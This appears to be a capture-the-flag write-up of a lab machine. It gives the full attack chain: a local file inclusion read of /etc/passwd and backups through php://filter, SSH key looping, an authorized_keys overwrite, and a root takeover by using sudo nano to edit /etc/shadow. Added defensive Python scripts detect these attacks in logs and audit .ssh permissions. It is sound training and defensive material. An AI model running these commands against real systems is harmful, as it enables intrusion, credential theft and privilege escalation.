ptd-silence-private

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55
Nmap scan report for 10.150.150.55
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 13 Jun 12 2020 test
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ::ffff:10.66.66.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 53m37s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2021-02-17T08:57:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds

┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Thu Feb 18 08:27:26 2021
URL_BASE: http://10.150.150.55/
WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 10000

---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/trick.php (CODE:200|SIZE:0) 
+ http://10.150.150.55/info.php (CODE:200|SIZE:70050) 
+ http://10.150.150.55/??????.php (CODE:200|SIZE:10918) 
+ http://10.150.150.55/?????.php (CODE:200|SIZE:10918) 

-----------------
END_TIME: Thu Feb 18 08:32:58 2021
DOWNLOADED: 10000 - FOUND: 4
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat trick.php 
<?php

include($_GET['page']);

?>

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST --data "file=browser.php" 10.150.150.55/info.php

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $smbclient -L 10.150.150.55 -U "" -N

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

trick.php?page=index.html

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php

And in that source you then find:
index.php?path=/

=> http://10.150.150.55/index.php?path=/

http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz
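The trick.php shown above hands `?page=` straight to `include()`, which is why a `php://filter/convert.base64-encode/resource=...` URI returns the raw source (or any readable file, such as /etc/passwd) base64-encoded instead of executing it. From the defender's side the same requests are easy to spot in the web server's access log. The scanner below is an added example written for this writeup, not code from the original post or from the target: it parses Apache combined-format lines and flags query parameters that carry a PHP stream wrapper, a `../` traversal, a null byte or an absolute path into a sensitive directory. The lines in `SAMPLE_LOG` are constructed to mirror the requests made in the writeup (10.66.66.42 is the client address that appears in the ftp-syst output above).

```python
"""Detect file-inclusion attempts in Apache access-log lines (added example)."""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: host ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each indicator is a sign that a parameter value is reaching a file-inclusion sink.
# absolute_path also matches after "=", so the resource= part of a php://filter URI is caught.
INDICATORS = {
    "php_wrapper": re.compile(r"^(php|data|expect|phar|zip)://", re.I),
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),
    "absolute_path": re.compile(r"(^|=)/(etc|home|root|var|proc|srv|opt|usr)/", re.I),
    "null_byte": re.compile(r"%00|\x00"),
}


def classify_value(value: str) -> List[str]:
    """Return the indicator names matching one parameter value.

    The value is decoded twice so double-URL-encoded payloads are seen in clear.
    """
    decoded = unquote(unquote(value))
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_line(line: str) -> Optional[dict]:
    """Parse one log line; return a finding dict if any parameter looks like LFI."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = {}
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            tags = classify_value(value)
            if tags:
                hits[param] = (value, tags)
    if not hits:
        return None
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "path": parts.path,
        "status": int(m.group("status")),
        "params": hits,
    }


def scan(lines) -> List[dict]:
    """Run scan_line over an iterable of log lines and keep only the findings."""
    return [f for f in (scan_line(ln) for ln in lines) if f]


# Constructed sample, not a real log from the target. Lines 1 and 2 are benign.
SAMPLE_LOG = [
    '10.66.66.42 - - [17/Feb/2021:10:20:11 +0100] "GET /index.php HTTP/1.1" 200 4694 "-" "Mozilla/5.0"',
    '10.66.66.42 - - [17/Feb/2021:10:21:03 +0100] "GET /trick.php?page=index.html HTTP/1.1" 200 10918 "-" "curl/7.74.0"',
    '10.66.66.42 - - [17/Feb/2021:10:24:40 +0100] "GET /trick.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 6260 "-" "curl/7.74.0"',
    '10.66.66.42 - - [17/Feb/2021:10:31:18 +0100] "GET /trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 5504 "-" "curl/7.74.0"',
    '10.66.66.42 - - [17/Feb/2021:10:33:02 +0100] "GET /index.php?path=/home/sally/backup/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.66.66.42 - - [17/Feb/2021:10:35:55 +0100] "GET /trick.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 4128 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        for param, (value, tags) in finding["params"].items():
            print(f"{finding['time']} {finding['host']} {finding['path']} "
                  f"{param}={value!r} -> {', '.join(tags)}")
```

Running it against the sample flags the two `php://filter` reads, the `path=/home/...` request and the encoded traversal, while the plain `page=index.html` request passes. A 200 status on such a request is the stronger signal: the server answered with file contents rather than an error. The fix on the application side is the usual one for this bug class: map `page` against an allowlist of known templates and never pass user input to `include()`.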

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $ls -la
total 256
drwxr-xr-x 1 user user 138 Feb 17 10:55 .
drwxr-xr-x 1 user user 2034 Feb 17 08:02 ..
-rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap
-rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php
-rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt
-rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php
-rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz
-rw-r--r-- 1 user user 13 Feb 17 08:06 test
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
100  4128  100  4128    0     0  58971      0 --:--:-- --:--:-- --:--:-- 58971
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
gary:x:1001:1001::/home/gary:/bin/sh
john:x:1002:1002::/home/john:/bin/sh
sally:x:1003:1003::/home/sally:/bin/sh
alice:x:1004:1004::/home/alice:/bin/sh
ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin
ftpuser:x:1005:1005::/home/ftpuser:/bin/sh
Debian-snmp:x:128:136::/var/lib/snmp:/bin/false
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo "$key"; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i "$key"; done

And then the same for the other users (gary, sally and alice)
for key in id_rsa*; do echo "$key"; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i "$key"; done

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt' | base64 -d > FLAG79.txt

echo "ssh-rsa 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 root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log

User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano

$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password: 
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#

root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
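The sudoers policy printed by `sudo -l` has two details worth noticing together: every invocation is written to /var/log/sudo.log (`logfile=/var/log/sudo.log`), and john may run /usr/bin/nano as root with NOPASSWD. An editor running as root is an arbitrary-file-write primitive, which is exactly how `sudo nano /etc/shadow` followed by `su root` with the `openssl passwd -6` hash works here. The session leaves a trace, though, and the parser below turns it into an alert. It is an added example, not code from the original writeup: it reads lines in the format sudo writes to its logfile and reports any file-writing command run as root whose arguments name a watched file. `SAMPLE_LOG` is constructed to match the session above; it is not a real log from the target.

```python
"""Alert on sudo-logged edits of security-critical files (added example)."""
import re
from typing import List, Optional

# sudo logfile line: "Mon DD HH:MM:SS : user : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) : (?P<user>\S+) : (?P<fields>.*)$"
)

WATCHED_FILES = {"/etc/shadow", "/etc/passwd", "/etc/group", "/etc/sudoers",
                 "/etc/ssh/sshd_config"}
WATCHED_DIRS = ("/etc/sudoers.d/", "/root/.ssh/", "/etc/cron.d/")
# Commands that let the caller write an arbitrary file as the target user.
FILE_WRITERS = {"nano", "pico", "vi", "vim", "ed", "tee", "cp", "mv", "dd", "sed"}


def parse_line(line: str) -> Optional[dict]:
    """Split one sudo log line into its fields; None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"time": m.group("ts"), "user": m.group("user")}
    for chunk in m.group("fields").split(" ; "):
        key, _, value = chunk.partition("=")
        rec[key] = value
    rec["argv"] = rec.get("COMMAND", "").split()
    return rec


def is_sensitive(rec: dict) -> bool:
    """True when a file-writing command runs as root with a watched path argument."""
    argv = rec["argv"]
    if not argv or rec.get("USER") != "root":
        return False
    tool = argv[0].rsplit("/", 1)[-1]          # /usr/bin/nano -> nano
    if tool not in FILE_WRITERS:
        return False
    return any(arg in WATCHED_FILES or arg.startswith(WATCHED_DIRS) for arg in argv[1:])


def alerts(lines) -> List[str]:
    """One alert string per sensitive invocation, in log order."""
    out = []
    for ln in lines:
        rec = parse_line(ln)
        if rec and is_sensitive(rec):
            out.append(f"{rec['time']} {rec['user']} -> root: {rec['COMMAND']} "
                       f"(tty {rec.get('TTY', '?')}, cwd {rec.get('PWD', '?')})")
    return out


# Constructed sample in sudo's logfile format; not taken from the target.
SAMPLE_LOG = [
    "Feb 17 10:50:12 : john : TTY=pts/0 ; PWD=/home/john ; USER=root ; COMMAND=list",
    "Feb 17 10:57:40 : john : TTY=pts/0 ; PWD=/home/john/.ssh ; USER=root ; COMMAND=/usr/bin/nano /home/john/notes.txt",
    "Feb 17 10:58:01 : john : TTY=pts/0 ; PWD=/home/john/.ssh ; USER=root ; COMMAND=/usr/bin/nano /etc/shadow",
    "Feb 17 11:02:17 : gary : TTY=pts/1 ; PWD=/home/gary ; USER=root ; COMMAND=/usr/bin/tee /etc/sudoers.d/gary",
    "Feb 17 11:03:09 : sally : TTY=pts/2 ; PWD=/home/sally ; USER=sally ; COMMAND=/usr/bin/nano /etc/passwd",
]

if __name__ == "__main__":
    for alert in alerts(SAMPLE_LOG):
        print(alert)
```

Two of the five sample lines fire: john's `nano /etc/shadow` and gary's `tee` into /etc/sudoers.d/. The `sudo -l` listing and the edit of a file in john's own home are left alone, as is sally's attempt that does not run as root. Since whoever reaches root can also edit /var/log/sudo.log, this only holds up if the log is shipped off-host as it is written; the matching policy fix is to drop the NOPASSWD editor rule and grant `sudoedit` on the specific files that actually need editing.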

Author : Puckiestyle

2 thoughts on “ptd-silence-private”

  1. Hi,

    Thanks for the writeup.
    Actually, if I can log in with ssh into all accounts (except john), I do not understand how I can create the authorized_keys in john’s directory (no rights).
    Can you explain please?

    1. If you ssh login to gary, you will see that the chatBackup file says that both John and Sally are network admins, which can help for ssh access, so when using the above for loop you can get Sally's id_rsa key and log in with it, then switch to john's home directory; using ls -la, you will see the .ssh directory (only accessible by john or the netAdmin group), then on your own machine you can use a tool (ssh-keygen) to create an ssh key pair, and overwrite the authorized_keys in john's .ssh directory with the new pub key you created, then you can ssh to john using the private key.
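The reply above pins down why the authorized_keys overwrite worked: john's .ssh directory was accessible to the netAdmin group, so another group member could write into it. sshd's StrictModes (on by default) refuses to use an authorized_keys file when the home directory, the .ssh directory or the file itself is writable by group or others, which is the check an administrator should be running across /home before an attacker does. The audit below is an added example, not code from the writeup or the commenters: `check_home` applies that writability rule (ownership, which sshd also verifies, is not checked here) and additionally reports a .ssh directory that is readable or traversable by anyone but its owner. `demo` builds a throwaway tree with a hardened `sally` and a mis-permissioned `john` so the check runs offline; the directory names and modes are constructed for the example.

```python
"""Audit home directories for .ssh permissions that let others plant keys (added example)."""
import os
import stat
import tempfile
from typing import Dict, List

OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH                                  # 0o022: what StrictModes refuses
OTHER_READ_EXEC = stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH  # 0o055: beyond owner-only


def check_home(home: str) -> List[str]:
    """Return findings for one home directory; an empty list means clean."""
    findings = []
    ssh_dir = os.path.join(home, ".ssh")
    auth = os.path.join(ssh_dir, "authorized_keys")
    # The StrictModes rule: none of these may be writable by group or others.
    for path in (home, ssh_dir, auth):
        if not os.path.exists(path):
            continue
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & OTHER_WRITE:
            findings.append(f"{path}: mode {mode:04o} is group/world writable")
    # Hygiene rule on top of sshd's: .ssh should be 0700, not listable by others.
    if os.path.isdir(ssh_dir):
        mode = stat.S_IMODE(os.stat(ssh_dir).st_mode)
        if mode & OTHER_READ_EXEC:
            findings.append(f"{ssh_dir}: mode {mode:04o} is accessible by others (expected 0700)")
    return findings


def audit(homes_root: str) -> Dict[str, List[str]]:
    """Run check_home over every directory directly under homes_root (e.g. /home)."""
    result = {}
    for name in sorted(os.listdir(homes_root)):
        home = os.path.join(homes_root, name)
        if os.path.isdir(home):
            result[name] = check_home(home)
    return result


def build_demo_tree(root: str) -> None:
    """Constructed fixture: sally keeps 0700 on .ssh, john leaves it group-writable (0770)."""
    for user, ssh_mode in (("sally", 0o700), ("john", 0o770)):
        home = os.path.join(root, user)
        ssh_dir = os.path.join(home, ".ssh")
        os.makedirs(ssh_dir)
        auth = os.path.join(ssh_dir, "authorized_keys")
        with open(auth, "w") as fh:
            fh.write("ssh-rsa AAAA-constructed-placeholder-key user@example\n")  # not a real key
        os.chmod(auth, 0o600)
        os.chmod(home, 0o750)
        os.chmod(ssh_dir, ssh_mode)   # set last so the file write above never hits a 0700 race


def demo() -> Dict[str, List[str]]:
    """Build the fixture in a temp directory, audit it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return audit(root)


if __name__ == "__main__":
    for user, findings in demo().items():
        print(f"{user}: {'clean' if not findings else ''}")
        for finding in findings:
            print("  " + finding)
```

Against the fixture, sally comes back clean and john gets two findings for the 0770 directory. Pointed at a real /home it needs to run as root to stat every user's .ssh, and a group-writable result like john's means either StrictModes has been turned off or the group can replace the file before the next login, both worth fixing.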
